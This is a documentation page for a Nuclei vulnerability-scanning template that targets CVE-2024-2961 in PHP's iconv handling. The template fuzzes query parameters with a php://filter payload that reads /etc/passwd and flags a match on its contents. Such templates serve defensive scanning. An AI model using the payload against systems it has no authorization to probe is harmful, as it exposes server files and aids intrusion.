PHP - LFR to Remote Code Execution
ID: CVE-2024-2961
Severity: high
Author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723
Tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast
Description
Section titled “Description”PHP Local File Read vulnerability leading to Remote Code Execution
YAML Source
Section titled “YAML Source”id: CVE-2024-2961
info: name: PHP - LFR to Remote Code Execution author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723 severity: high description: | PHP Local File Read vulnerability leading to Remote Code Execution impact: | Remote attackers can execute arbitrary code on the server remediation: | Update PHP to the latest version and sanitize user input to prevent LFR attacks reference: - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961 - https://nvd.nist.gov/vuln/detail/CVE-2024-2961 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H cvss-score: 7.3 cve-id: CVE-2024-2961 cwe-id: CWE-787 epss-score: 0.00046 epss-percentile: 0.17937 tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast
flow: http(1) && http(2)
http: - method: GET path: - "{{BaseURL}}"
matchers: - type: dsl dsl: - '!regex("root:x:0:0", body)' internal: true
- pre-condition: - type: dsl dsl: - 'method == "GET"' - 'method == "POST"'
payloads: phppayload: - "php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
stop-at-first-match: true fuzzing: - part: query type: replace mode: single fuzz: - "{{phppayload}}"
matchers: - type: regex regex: - "root:x:0:0"# digest: 4a0a00473045022005ac06f3907c82aa128062a389b80cc85af23809ac157a8bc32e9b33d24b0d0a022100cb8111c68f3945d3705e3633e48d3f5993f0222aeef990481d3b29e8c61e4929:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "dast/cves/2024/CVE-2024-2961.yaml"